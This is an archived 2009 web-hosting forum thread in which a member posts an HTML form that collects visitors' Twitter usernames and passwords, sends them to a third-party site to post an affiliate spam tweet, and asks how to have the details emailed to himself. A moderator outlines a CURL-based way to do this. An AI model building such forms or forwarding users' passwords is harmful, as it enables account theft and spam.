Web Hosting Vodahost    

Home Take The Royal Tour! Order Now Features Prices
Go Back   Web Hosting > VodaHost Web Hosting Support > mySQL & PHP

Notices

mySQL & PHP Discussions, information and help with mySQL and PHP.

Reply
 
Thread Tools
  #1  
Old 06-05-2009, 03:03 AM
First Lieutenant
 
Join Date: Jan 2007
Location: Newcastle , Australia
Posts: 171
Send a message via MSN to aussiebaz Send a message via Skype™ to aussiebaz
Default coding question, need help

Hi

I have a question related to a form.

I have this code on one of my pages but
what I want to do is when someone completes
the form it sends me an email with their
details
I also want to include a spot for them to
insert their email address

What code would I need to add to make this happen

Appreciate any help

Voda domain: uvzapit.com

The code:
<center><form action="http://www.barryalger.com/viraltweeters/viraltweets.php" method="post"><input name="twitter_redirect" value="http://doyoutweet.weebly.com" type="hidden"><style>.viraltweet { padding:8px; width:310px; border:1px solid #CCCCCC; font-family:Courier; font-size:10pt;}.vt_input {width:155px;}.twitter_message { width:300px; height:60px;}.twitter_follow { margin:10px 0 10px; padding:3px; border:1px dotted GRAY; background-color:#F1F1F1;}.vt_caption { font-family:Arial; font-size:8pt; color:gray; text-align:center;}.vt_aff { padding:8px; width:300px; text-align:right; font-family:Arial; font-size:8pt; }</style><div class="viraltweet">Twitter Username: <input class="vt_input" name="twitter_username" type="text"><br>Twitter Password: <input class="vt_input" name="twitter_password" type="password"><br><br><textarea class="twitter_message" name="msg_placeholder" disabled="true">How we make 3,000 a month on Twitter using a FREE affiliate program (Already Twitter Tested) http://twitterrevealed.weebly.com</textarea><br><input name="twitter_message" value="How we make 3,000 a month on Twitter using a FREE affiliate program (Already Twitter Tested) http://twitterrevealed.weebly.com" type="hidden"><div class="twitter_follow">Follow @aussiebaz? <input name="twitter_follow" checked="checked" type="checkbox"></div><input name="twitter_follow_name" value="aussiebaz" type="hidden"><div align="center"><br><input value="Tweet Now!" type="submit"></div><span class="vt_caption">This information is not stored and only one tweet will be sent</span></div> <div class="vt_aff">Powered by <a href="http://isellstuff.viraltweets.hop.clickbank.net/" target="_blank">Viral Tweets</a></div> </form><!-- www.**********.com Analytics Code --><script type="text/javascript" src="http://analytics.hosting24.com/count.php"></script><noscript><a href='http://www.hosting24.com/'><img src='http://analytics.hosting24.com/count.php' alt='web hosting' /></a></noscript><!-- End Of Code --></center>
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post!
Reply With Quote
  #2  
Old 06-05-2009, 04:38 PM
navaldesign's Avatar
General & Forum Moderator
 
Join Date: Oct 2005
Location: Italy
Posts: 10,052
Default Re: coding question, need help

In other words, you want TWO submissions ? one to the site that is in the form action and one to you ?

If yes, you need to need a specific script that will FIRST send the details to you and then submit the same details to barryalger.com

This can be done easily using the CURL library commands but you need to have php experience to do this, as you can't use the built in form processor for the first submission.
__________________
Navaldesign
Logger Lite: Low Cost, Customizable, multifeatured Login script
Instant Download Cart: a Powerfull, Customized, in site, DB driven, e-products Cart
DBTechnosystems.com Forms, Databases, Shopping Carts, Instant Download Carts, Loggin Systems and more....
Advanced BlueVoda Form Processor : No coding form processor! Just install and use! Now with built in CAPTCHA!

Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post!
Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off



All times are GMT +1. The time now is 06:04 AM.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.2.0 RC7
2005-2009 VodaHost Web Hosting Your Perfect Web Host - All Rights Reserved

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203